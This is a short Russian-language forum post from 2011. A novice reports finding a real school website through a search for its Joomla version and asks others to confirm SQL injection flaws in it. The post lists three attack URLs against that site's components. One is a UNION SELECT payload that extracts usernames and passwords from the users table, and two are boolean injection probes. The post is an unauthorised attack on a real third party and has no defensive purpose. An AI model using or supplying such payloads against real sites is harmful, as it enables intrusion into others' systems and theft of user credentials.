
04.03.2011, 18:34
|
|
Новичок
Регистрация: 25.02.2011
Сообщений: 5
С нами:
8006006
Репутация:
0
|
|
Судя по первому абзацу все-же сканер врет...
Сайт нагуглил по версии джумлы, вот линки на предполагаемые уязвимости
liceum9.ru/index.php?option=com_comprofiler&task=userProfile& user=1+and+1=2 юзеры начинаются с id 121, для их просмотра пришлось зарегится.
http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id= 60&Itemid=%2099999%20union%20select%201,concat_ws% 280x3a,username,password%29,%203,4,5%20from%20jos_ users/*
http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&i d='0'+and+'1'='2
В последнем вообще валидный id подобрать не смог...
Проверьте, пожалуйста, эти ссылки на sql-уязвимость. Очень хочется, чтобы первый блин не вышел комом.
|
|
|